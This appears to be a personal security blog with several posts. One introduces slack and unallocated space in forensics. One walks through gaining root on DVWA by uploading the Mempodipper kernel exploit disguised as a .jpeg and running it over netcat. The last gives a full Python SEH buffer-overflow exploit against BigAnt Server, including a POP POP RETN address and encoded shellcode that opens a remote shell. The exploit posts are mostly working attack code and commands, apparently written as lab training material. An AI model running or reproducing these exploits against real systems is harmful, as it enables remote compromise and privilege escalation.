• 0

Computer Forensic - Introduction


Computer forensics deals with collecting the evidence of a good information system in the form of hardware or software and can be used as legal evidence in court.

Slack space or sometimes referred to as file slack is the area between the end of a file and end of the last cluster or sector used by the file in question. Area is an area that will not be used again to store the information there, so the area is "wasted" useless. Slack space is common in file systems that use a large cluster size, while the file system that uses a small cluster size can organize the storage media more effectively and efficiently. Amount of wasted disk space can be thought is estimated by multiplying the number of files (including the number of directories) with half the size of a cluster.

Unallocated space, or in the other word "free space", is logical space on a hard drive that can be used by the system to put files on. Unallocated space is the opposite of "allocated" space, which means a place on the hard drive where there's already files written or stored in it. Unallocated space is different from Slack space. The difference, in the unallocated space the system can put files in it, where in the slack space the system can't put any files in it. Simple right?  :)


Here's an example. If we put a file into certain space on the hard drive, that part of the hard drive is now in allocated status because the file is using its space. When a space is in allocated status, no other files can be written to that space. If the file we stored is deleted then that space of the hard drive is now in the unallocated status. This means that we can put some files in it.

Generally, files can only be stored in the unallocated space. New storage device is have all its space unallocated virtually, why? because small portion of the space will be taken by the system files to do its work. Like when in windows there will always be a "recycler" hidden folder to store a data about deleted files, or in linux called ".Thrash".

Example case. A newly formatted 100 GB flashdisk have 100% unallocated space (actually its 99.9% because of the filesystem). If a 1 GB file is stored on the disk then there will be 1%(1GB) allocated space and 99% unallocated space(99GB). If a 9 GB movies is stored to the disk, then there will be a total of 10%(10GB) of allocated space and 90%(90GB) of unallocated space. So, the movies will only be stored into the remaining unallocated space, not overwritting the previous one.


  • 0

DVWA Medium Exploitation


In this post, I'll try to show how to gain a root access through a web application. There are a lot of method to do that, this is one of them. The web application that will be used is DVWA(Damn Vulnerable Web Application). You can download it here.

  • Start up your MySQL and Apache on backtrack.

type : #service apache2 start
type : #service mysql start
  • Open DVWA on your browser

type : localhost dvwa
Login as usual, with the username: admin and password: password.
  • and it's contents in dvwa
The vulnerability that I'll use to gain root access from this website is through its "command execution" Because a vulnerability in a web, this is the most dangerous feature to have. Hackers can get a shell without having to place a backdoor inside the server.

  • Set the security level to medium. Because in my training advocated for this
  • Lets try to do a normal command





  • I'll use a local exploit on the system to gain the root access. Before searching the exploit, lets see what version of kernel the system running.
  • Finally I look at exploit-db.com with keywords 2.6.39, 

  • and I found an exploit with the C language can be downloaded here
  • after that, let's compile the c file it with the command: #gcc Mempodipper.c -o linux


  • lets try to upload the exploit

  • the file was not uploaded


  • Lets try to add image extention into the exploit. I'll make it into linux.jpeg
  • and upload again

  • Good. Now, lets connect to the server using netcat to execute that exploit.
  • Lets see if the exploit is correctly uploaded.
  • Now, execute netcat on the dvwa on listening mode.


  • Look on the bottom/status bar. The browser will wait for a connection. In backtrack's terminal type this. "nc 127.0.0.1 4321"
  • lets to try execute
type : # ./linux.jpeg


  • it's running, if you want to get root
type : su




#No limit to try harder



  • 0

Buffer Overflow (SEH) on Ezserver

- The First, install Ezserver on windows xp and running

-  we do information gathering by way of scanning the destination IP ago with the help of "nmap" we scan for open ports and their operating systems are targeted: (ip target = 172.16.227.128)
# Nmap -v -sV -A -o -p 1-65535 172.16.227.128
- after that we know port 8000 is open and target using windows xp, so that when we make our fuzzer know the steps


  • 0

Buffer Overflow BigAnt Server SEH


This time, I will try to explain how to use the software with SEH protection system called BigAnt Server. SEH exception handler is to protect the EIP to be overflowing with abnormal flow in the software. This forces us to use a different attack vectors and techniques because if we use the same technique as in Back Direct exploitation of the attack will not work because of SEH.


- Create Fuzzer with python 
this is my fuzzer :

#!/usr/bin/python
import socket
address="192.168.56.2"
port=6660
buffer="USV "
buffer+="\x41"*2500
buffer+="\r\n\r\n"
sock=socket.socket(socket.AF_INET, socket.SOCK_STREAM)
sock.connect((address,port))
sock.send(buffer)
sock.close()
print ("Done")
- BigAnt server and run OllyDbg, attach to AntServer. and run the fuzzer has been made 
- As you can see above, the EIP isn't overwritten by the fuzzer directly because of the SEH. To view what happen in SEH, click View>SEH chain.
- The SEH handle the excess 'A' character. To transmit the char into the EIP press Shift+F9
- In the bottom right of the OllyDbg windows, we can see that the fuzzer's data sent to the application also entered the stack memory. To see it right click on the stack line then click follow in dump. 

- To pass the SEH protection we must find the POP POP RETN command on one of the modules that loaded by BigAnt. The module must not have SafeSEH ON, and DLLCHARACTERISTICS_NO_SEH in it. Usually, modules that don't have it is a third party module outside Windows. But, in this case BigAnt don't have a modules in its system, so we must use the modules from Windows.


 - We will use VBAJET32.dll located in C:\\Windows\system32 as the door to pass the SEH as the modules is also loaded by BigAnt.

- After that, we must find the POP POP RETN command on this module. Open your module then right click > Search for > Sequence of Commands.
- Enter POP r32, POP r32, and RETN on the search box.
- Here's what we will get. The address of POP POP and RETN on the VBAJET32.dll module.
- Ok, next step we must find the address where the SEH is overwritten. As usual, we will use pattern_create and pattern_offset to do this.
- Make a pattern 2500 bytes long then insert it on the fuzzer.
#!/usr/bin/python
import socket
address="172.16.227.128"
port=6660
buffer="USV "
buffer+="Aa0Aa1Aa2Aa3Aa4Aa5Aa6Aa7Aa8Aa9Ab0Ab1Ab2Ab3Ab4Ab5Ab6Ab7Ab8Ab9Ac0Ac1Ac2Ac3Ac4Ac5Ac6Ac7Ac8Ac9Ad0Ad1Ad2Ad3Ad4Ad5Ad6Ad7Ad8Ad9Ae0Ae1Ae2Ae3Ae4Ae5Ae6Ae7Ae8Ae9Af0Af1Af2Af3Af4Af5Af6Af7Af8Af9Ag0Ag1Ag2Ag3Ag4Ag5Ag6Ag7Ag8Ag9Ah0Ah1Ah2Ah3Ah4Ah5Ah6Ah7Ah8Ah9Ai0Ai1Ai2Ai3Ai4Ai5Ai6Ai7Ai8Ai9Aj0Aj1Aj2Aj3Aj4Aj5Aj6Aj7Aj8Aj9Ak0Ak1Ak2Ak3Ak4Ak5Ak6Ak7Ak8Ak9Al0Al1Al2Al3Al4Al5Al6Al7Al8Al9Am0Am1Am2Am3Am4Am5Am6Am7Am8Am9An0An1An2An3An4An5An6An7An8An9Ao0Ao1Ao2Ao3Ao4Ao5Ao6Ao7Ao8Ao9Ap0Ap1Ap2Ap3Ap4Ap5Ap6Ap7Ap8Ap9Aq0Aq1Aq2Aq3Aq4Aq5Aq6Aq7Aq8Aq9Ar0Ar1Ar2Ar3Ar4Ar5Ar6Ar7Ar8Ar9As0As1As2As3As4As5As6As7As8As9At0At1At2At3At4At5At6At7At8At9Au0Au1Au2Au3Au4Au5Au6Au7Au8Au9Av0Av1Av2Av3Av4Av5Av6Av7Av8Av9Aw0Aw1Aw2Aw3Aw4Aw5Aw6Aw7Aw8Aw9Ax0Ax1Ax2Ax3Ax4Ax5Ax6Ax7Ax8Ax9Ay0Ay1Ay2Ay3Ay4Ay5Ay6Ay7Ay8Ay9Az0Az1Az2Az3Az4Az5Az6Az7Az8Az9Ba0Ba1Ba2Ba3Ba4Ba5Ba6Ba7Ba8Ba9Bb0Bb1Bb2Bb3Bb4Bb5Bb6Bb7Bb8Bb9Bc0Bc1Bc2Bc3Bc4Bc5Bc6Bc7Bc8Bc9Bd0Bd1Bd2Bd3Bd4Bd5Bd6Bd7Bd8Bd9Be0Be1Be2Be3Be4Be5Be6Be7Be8Be9Bf0Bf1Bf2Bf3Bf4Bf5Bf6Bf7Bf8Bf9Bg0Bg1Bg2Bg3Bg4Bg5Bg6Bg7Bg8Bg9Bh0Bh1Bh2Bh3Bh4Bh5Bh6Bh7Bh8Bh9Bi0Bi1Bi2Bi3Bi4Bi5Bi6Bi7Bi8Bi9Bj0Bj1Bj2Bj3Bj4Bj5Bj6Bj7Bj8Bj9Bk0Bk1Bk2Bk3Bk4Bk5Bk6Bk7Bk8Bk9Bl0Bl1Bl2Bl3Bl4Bl5Bl6Bl7Bl8Bl9Bm0Bm1Bm2Bm3Bm4Bm5Bm6Bm7Bm8Bm9Bn0Bn1Bn2Bn3Bn4Bn5Bn6Bn7Bn8Bn9Bo0Bo1Bo2Bo3Bo4Bo5Bo6Bo7Bo8Bo9Bp0Bp1Bp2Bp3Bp4Bp5Bp6Bp7Bp8Bp9Bq0Bq1Bq2Bq3Bq4Bq5Bq6Bq7Bq8Bq9Br0Br1Br2Br3Br4Br5Br6Br7Br8Br9Bs0Bs1Bs2Bs3Bs4Bs5Bs6Bs7Bs8Bs9Bt0Bt1Bt2Bt3Bt4Bt5Bt6Bt7Bt8Bt9Bu0Bu1Bu2Bu3Bu4Bu5Bu6Bu7Bu8Bu9Bv0Bv1Bv2Bv3Bv4Bv5Bv6Bv7Bv8Bv9Bw0Bw1Bw2Bw3Bw4Bw5Bw6Bw7Bw8Bw9Bx0Bx1Bx2Bx3Bx4Bx5Bx6Bx7Bx8Bx9By0By1By2By3By4By5By6By7By8By9Bz0Bz1Bz2Bz3Bz4Bz5Bz6Bz7Bz8Bz9Ca0Ca1Ca2Ca3Ca4Ca5Ca6Ca7Ca8Ca9Cb0Cb1Cb2Cb3Cb4Cb5Cb6Cb7Cb8Cb9Cc0Cc1Cc2Cc3Cc4Cc5Cc6Cc7Cc8Cc9Cd0Cd1Cd2Cd3Cd4Cd5Cd6Cd7Cd8Cd9Ce0Ce1Ce2Ce3Ce4Ce5Ce6Ce7Ce8Ce9Cf0Cf1Cf2Cf3Cf4Cf5Cf6Cf7Cf8Cf9Cg0Cg1Cg2Cg3Cg4Cg5Cg6Cg7Cg8Cg9Ch0Ch1Ch2Ch3Ch4Ch5Ch6Ch7Ch8Ch9Ci0Ci1Ci2Ci3Ci4Ci5Ci6Ci7Ci8Ci9Cj0Cj1Cj2Cj3Cj4Cj5Cj6Cj7Cj8Cj9Ck0Ck1Ck2Ck3Ck4Ck5Ck6Ck7Ck8Ck9Cl0Cl1Cl2Cl3Cl4Cl5Cl6Cl7Cl8Cl9Cm0Cm1Cm2Cm3Cm4Cm5Cm6Cm7Cm8Cm9Cn0Cn1Cn2Cn3Cn4Cn5Cn6Cn7Cn8Cn9Co0Co1Co2Co3Co4Co5Co6Co7Co8Co9Cp0Cp1Cp2Cp3Cp4Cp5Cp6Cp7Cp8Cp9Cq0Cq1Cq2Cq3Cq4Cq5Cq6Cq7Cq8Cq9Cr0Cr1Cr2Cr3Cr4Cr5Cr6Cr7Cr8Cr9Cs0Cs1Cs2Cs3Cs4Cs5Cs6Cs7Cs8Cs9Ct0Ct1Ct2Ct3Ct4Ct5Ct6Ct7Ct8Ct9Cu0Cu1Cu2Cu3Cu4Cu5Cu6Cu7Cu8Cu9Cv0Cv1Cv2Cv3Cv4Cv5Cv6Cv7Cv8Cv9Cw0Cw1Cw2Cw3Cw4Cw5Cw6Cw7Cw8Cw9Cx0Cx1Cx2Cx3Cx4Cx5Cx6Cx7Cx8Cx9Cy0Cy1Cy2Cy3Cy4Cy5Cy6Cy7Cy8Cy9Cz0Cz1Cz2Cz3Cz4Cz5Cz6Cz7Cz8Cz9Da0Da1Da2Da3Da4Da5Da6Da7Da8Da9Db0Db1Db2Db3Db4Db5Db6Db7Db8Db9Dc0Dc1Dc2Dc3Dc4Dc5Dc6Dc7Dc8Dc9Dd0Dd1Dd2Dd3Dd4Dd5Dd6Dd7Dd8Dd9De0De1De2De3De4De5De6De7De8De9Df0Df1Df2D"
buffer+="\r\n\r\n"
sock=socket.socket(socket.AF_INET, socket.SOCK_STREAM)
sock.connect((address,port))
sock.send(buffer)
sock.close()
print ("Done")

- Execute it, then see what happen in OllyDbg. Don't forget to restart both OllyDbg and BigAnt server first.

- Use pattern_offset to get the exact address.
# ./pattern_offset.rb 42326742
966

- lets try to overwrite the SEH with the address of POP POP RETN on the VBAJET32.dll module. Change the script again.

#!/usr/bin/python
import socket
address="172.16.227.128"
port=6660
buffer="USV "
buffer+="\x90"*962
buffer+="\xcc\xcc\xcc\xcc"
buffer+="\x41\x41\x41\x41"
buffer+="\x90"*(2504-len(buffer))
buffer+="\r\n\r\n"
sock=socket.socket(socket.AF_INET, socket.SOCK_STREAM)
sock.connect((address,port))
sock.send(buffer)
sock.close()
print ("Done")
and now :

Place a breakpoint on the POP POP RETN address on VBAJET32.dll module.
- Now, execute it then see what SEH Chain will display.
- Press Shift+F9 to continue the process to VBAJET32.dll then press it again to continue the POP POP RETN sequence located in the module. After that press F7 until the process reach the RETN command.

- Next, generate the payload using msfweb.

- Why there are 0x20 and 0x25 in the Restricted Characters columns? It is a bad character.
- Generated payload.
- Insert on fuzzer.

#!/usr/bin/python
import socket
address="172.16.227.128"
port=6660
buffer="USV "
buffer+="\x90"*962
buffer+="\xeb\x06\x90\x90"
buffer+="\x6A\x19\x9A\x0F"
buffer+="\x90"*32
buffer+=("\x33\xc9\xd9\xc2\xbf\x9f\x35\x1b\xc3\xd9\x74\x24\xf4\xb1\x51\x5e"
"\x31\x7e\x15\x03\x7e\x15\x83\x59\x31\xf9\x36\x99\x50\x16\xf5\x89"
"\x5c\x17\xf9\xb6\xff\x63\x6a\x6c\x24\xff\x36\x50\xaf\x83\xbd\xd0"
"\xae\x94\x35\x6f\xa9\xe1\x15\x4f\xc8\x1e\xe0\x04\xfe\x6b\xf2\xf4"
"\xce\xab\x6c\xa4\xb5\xec\xfb\xb3\x74\x26\x0e\xba\xb4\x5c\xe5\x87"
"\x6c\x87\x2e\x82\x69\x4c\x71\x48\x73\xb8\xe8\x1b\x7f\x75\x7e\x44"
"\x9c\x88\x6b\x79\xb0\x01\xe2\x11\xec\x09\x94\x2a\xdd\xea\x32\x27"
"\x5d\x3d\x30\x77\x6e\xb6\x36\x6b\xc3\x43\xf6\x9b\x45\x3c\x79\xd5"
"\x77\x50\xd5\x16\x51\xce\x85\x8e\x36\x3c\x18\x26\xb0\x31\x6e\xe9"
"\x6a\x49\x5e\x7d\x58\x58\xa3\x46\x0e\x5c\x8a\xe7\x27\x47\x55\x96"
"\xd5\x80\x98\xcd\x4f\x93\x63\x3d\xe7\x4a\x92\x48\x55\x3b\x5a\x64"
"\xf5\x97\xf7\xdb\xa9\x54\xab\x98\x1e\xa4\x9b\x78\xc9\x4b\x40\xe2"
"\x5a\xe5\x99\x7f\x34\x51\x43\x0f\x02\xce\x8b\x39\xe6\xe1\x22\x90"
"\x08\xd1\xad\xbe\x5a\xfc\xc4\xe9\x5b\xd7\x44\x40\x5b\x08\x02\x8f"
"\xea\x2f\x9a\x18\x12\xf9\x4d\xf2\xb8\x53\x91\x2a\xd3\x34\x8a\xb3"
"\x12\xbd\x03\xbc\x4d\x6b\x53\x92\x14\xfe\xcf\x74\xb1\x9d\x62\xf1"
"\xa4\x08\x2d\x58\x0e\x01\x44\xbd\x3a\xdd\xde\xa3\x8a\x1d\x13\x89"
"\x13\xdf\xf9\x33\xa9\xcc\x92\x46\x54\x35\x3e\xf3\x02\x2d\x32\xfd"
"\xe6\xb8\x4d\x74\x4d\x3a\x67\x2d\x1a\x96\xd9\x80\xf5\x7c\xdb\x73"
"\xa7\xd5\x8a\x8c\x97\xbe\x81\xab\x1d\xf1\x89\xb4\xc8\x67\xd1\xb5"
"\xc2\x88\xfd\xc2\x7a\x8b\x7d\x10\xe0\x8c\x54\xca\x16\xa2\x31\x94"
"\x30\xa1\xb1\x3b\x3e\xf0\xc9\x6b")
buffer+="\x90"*(2504-len(buffer))
buffer+="\r\n\r\n"
sock=socket.socket(socket.AF_INET, socket.SOCK_STREAM)
sock.connect((address,port))
sock.send(buffer)
sock.close()
print ("Done")


- Execute the fuzzer then connect using telnet to the target.






Diberdayakan oleh Blogger.

Copyright © / scxo2oco71

Template by : Urang-kurai / powered by :blogger